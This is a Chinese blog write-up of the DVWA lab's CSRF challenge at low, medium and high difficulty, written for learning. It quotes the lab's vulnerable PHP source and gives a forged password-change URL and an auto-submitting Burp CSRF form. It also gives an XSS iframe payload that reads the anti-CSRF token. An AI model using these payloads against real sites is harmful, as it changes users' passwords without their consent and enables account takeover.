DVWA-CSRF漏洞【全难度】

原创 已于 2023-06-10 20:49:10 修改 · 412 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#csrf #安全

于 2023-06-10 20:47:43 首次发布
GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

DVWA-CSRF漏洞【全难度】

CSRF漏洞全称是Cross-site Request Forgery,跨站请求伪造。

这个漏洞主要的思路是利用了本来就登录在目标网站A的用户,当这些用户点击了相应的伪造网站B后,这些网站中的陷阱就会使用户访问网站A(在用户不知道的情况下),这样就可以借助用户之手,做到列入修改密码之类的操作。

Low级别

在这里插入图片描述

我们可以看看源码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

我们可以看到,这份源码没有什么防御机制,没有Token值。同时我们可以看出,这个密码值是直接用GET请求进行提交的。
所以我们可以直接构造链接(因为我这边是直接使用的Docker进行DVWA的搭建,本地端口对其进行了映射,所以这里是8082,自己搭建的用自己的URL就好了):

http://localhost:8082/vulnerabilities/csrf/index.php?password_new=admin123&password_conf=admin123&Change=Change#

直接执行链接后,就会跳转到修改密码页面,并且显示密码修改成功。
在这里插入图片描述

利用漏洞

我们要利用这个漏洞,首先需要找一个受害者。
使用BurpSuite可以快速构造攻击页面:
在这里插入图片描述
在这里插入图片描述
这里我们获取并且构造我们想要的页面,当受害者访问了我们的页面并且点击了按钮,就会被修改密码

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost:8082/vulnerabilities/csrf/index.php">
      <input type="hidden" name="password&#95;new" value="hack123" />
      <input type="hidden" name="password&#95;conf" value="hack123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

注意,受害者必须要使用他登录过这个网站(我们以DVWA为例)的浏览器,因为受害者的登录信息是会被存储到这个浏览器中的,如果使用别的浏览器,只会跳转到dvwa的开始登录界面。

Medium级别

我们再看看源码

 <?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ])!=-1 ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

从第一行的if判断

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ])!=-1 )

我们可以看出这个级别的难度是为了让我们关注$_SERVER[ 'HTTP_REFERER' ],也就是我们访问时候的http头部中的Referer字段问题。
直接修改头部就行(不过我这边直接不用修改也可以完成修改密码,我也不清楚为什么)
在这里插入图片描述
不懂Referer请求头的可以去网上搜搜,或者问问GPT。

High级别

看看源码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

从这里

   checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

可以知道他开始检测Token值了。我们可以直接Token绕过。

使用BurpSuite进行Token绕过

BurpSuite中有一个插件,叫做CSRF Token Tracker
在这里插入图片描述
安装后进行使用

利用XSS漏洞配合

不过我研究了一个下午,我发现我的BurpSuite中这个插件总是没有反应,我也不知道为什么,可能是某些地方总是会有Bug吧,所以我使用了另一个方法,那就是和Xss联动。(如果有人用这个插件弄出来的可以给我讲讲是怎么办到的)

因为我们知道,当你每一次访问CSRF的修改密码的界面的时候,都会导致你的浏览器获得了一个新的user_token,所以如果此时,受害者没有继续更新加载这个页面,那么Token值就会作为一个变量存在浏览器中。所以我们使用XSS攻击就可以直接获取到它的值。

PayLoad如下:

<iframe src="../csrf" οnlοad=alert(frames[0].document.getElementsByName('user_token')[0].value)>

这个Payload首先跳转到了csrf页面,onload在页面加载时就开始执行,获取了frames[0],也就是我们的iframe中的自己的token

在这里插入图片描述

此时,如果不出意外的话,此时间段整个浏览器的token就只有我们获得的这一个。

然后我们利用这个Token进行和上文一样的方式,就可以修改掉密码了
在这里插入图片描述

您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

DVWA-CSRF漏洞
sc_Pease的博客
01-29 576
参考:https://blog.youkuaiyun.com/qq_44720671/article/details/97393100 一、漏洞简介 1,CSRF:cross-site request forgery跨站请求伪造,一种常见Web攻击。 2,利用场景:攻击者伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击就完成了。 3,与XSS比较:csrf是借助用户的权限去完成,而xss是盗取用户权限去进行破坏。 二、查看不同难度dvwa源代码 1,low难度 查看网页源代码
DVWA——CSRF漏洞
qq_62803993的博客
01-14 493
首先进入初级页面我们知道这是一个修改密码的,当我们输入密码进行修改后,提示修改成功后,我们会发现这也是一个get型提交。那我们就试试直接在地址栏中修改内容,看能否执行成功。(修改内容后,我们复制链接重新打开一个界面,然后输入网址进入页面,出现下图,要注意的是我们必须使用同一个浏览器,因为在访问页面时通常存在cookie认证,否则即使点击了恶意链接也没用。
DVWACSRF漏洞
qq_40023447的博客
07-18 1731
CSFR漏洞 CSRF简介 CSRF名是Cross Site Request Forgery,翻译成中文就是跨站点请求伪造。其通过利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作。 漏洞原理 因为Web应用程序在用户进行敏感操作时,如修改账...
DVWA系列之18 CSRF漏洞分析
weixin_34205076的博客
12-25 286
下面我们来查看一下low级别的CSRF源码:代码中在获取了$pass_new和$pass_conf这两个变量之后,利用mysql_real_escape_string()函数进行了过滤,这样虽然可以防止SQL注入,但却无法阻止CSRF***,之后这两个变量便被直接代入UPDATE语句中执行了数据库更新操作。下面再来分析一下medium级别的代码:可以看到这里在获取$pass_new和$pass_c...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
#### CSRF漏洞 1. **漏洞分析**: - 低级漏洞中,修改密码无需验证原密码,仅需新密码与确认密码一致即可。 - 中级漏洞引入了HTTP_REFERER检查,增加了攻击的复杂性。 - 高级漏洞中增加了对原密码的验证。 2. **...
DVWA-CSRF(跨站请求伪造)
qq_45751902的博客
04-25 3184
目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(跨站请求伪造)简介 概念 CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1821
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
精选资源
DVWA-master安装包
02-28
DVWA中,每个漏洞都有不同的难度级别,从低到高,帮助用户逐步理解并掌握漏洞利用和防御策略。同时,通过修复这些漏洞,你可以学习如何编写更安全的代码,提高Web应用的安全性。 学习过程中,你还可以利用一些...
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 2万+
CSRF简介 csrf称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
使用dvwa环境进行csrf漏洞练习
DXfighting_的博客
04-14 797
登录dvwa环境,并将等级设为low, 打开csrf看到一个修改密码界面 查看源代码,发现这里只对两次输入的密码是不是相同进行判断,未做任何防护 使用hackerbar发现输入的参数在url中,我们可以利用这个特点 写一个csrf.Php文件, <img src="http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change..
DVWA-—【CSRF漏洞利用
qq_34914659的博客
05-20 1379
1.漏洞介绍 CSRF跨站点请求伪造(Cross—Site Request Forgery),攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。https://www.freebuf.com/articles/web/253838.htmlCSRF和XSS的最大的区别在于,CSRF并没有盗取cookie而是直接利用。 下图...
csrf漏洞(三)
2302_80280669的博客
08-21 552
若长时间未登录DVWA,无法正常登录。此时可直接访问。
DVWA CSRF 漏洞实践报告
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
10-13 2562
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
【web安全DVWA CSRF漏洞分析与利用
KP_0x01的博客
07-13 1275
安全级别防护措施攻击难度Low无防护★☆☆☆☆MediumReferer检查★★☆☆☆HighCSRF Token★★★☆☆Impossible多因素认证★★★★★。
DVWA靶场笔记之csrf漏洞原理
Alonegrief的博客
11-20 1590
DVWA漏洞源码分析——(三)csrf Csrf原理: Csrf中文称为跨站请求伪造,利用受害者未失效的身份认证信息(cookie,会话等)诱骗其点击恶意链接或者去访问攻击者构造的含有攻击代码的页面,在受害者不知情的情况下,以受害者的身份向服务器发送请求,从而达到一些非法操作(转账,改密)。 Csrf和xss的攻击方式有点相似,但是不同的是: (1) csrf需要登录后才能操作,xss不需要 (2) csrf是请求页面api来时先非法操作,xss是先当前页面植入js脚本来修改页面内容 例子: 这里我们用dv
CSRF漏洞(原理、DVWA实验、修复建议)
coderge's 优快云 Blog.
09-20 4329
目录 1 介绍CSRF漏洞 2 CSRF漏洞的原理 3 DVWA CSRF实验过程 3.1 low级别 3.2 medium级别 相关函数说明 3.3 high级别 3.4 impossible级别 4 CSRF漏洞修复建议 1 介绍CSRF漏洞 CSRF (Cross -site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)
DvwaCsrf攻击笔记
JBlock的博客
10-22 2334
介绍今天笔者便用dvwa漏洞测试环境来探讨一下跨站请求攻击。 Csrf称为Cross-Site Request Forgery中文解释为跨站请求伪造攻击。Csrf通常与XSS结合起来进行利用,一般存在XSS漏洞的网站,很大可能也存在Csrf漏洞。二者最简单的区别就是一个是获得用户信任,一个是获得服务端的信任。生活场景 比如说有一天,你闲来无事在寝室上网,然后打开网页,查看一下自己的银行余e,
【渗透测试】【DVWACSRF
preserphy的博客
08-07 1820
CSRF称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
dvwa靶场csrf的high难度已经有了获取user_token的脚本内容,如何使用
最新发布
08-05
- `action`:指向DVWACSRF漏洞URL - `iframe.src`:加载真实修改密码页面以窃取token 3. **执行流程**: 1. 用户访问恶意页面 2. 隐藏iframe加载DVWA修改密码页 3. JavaScript提取iframe中的`user_token` 4...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值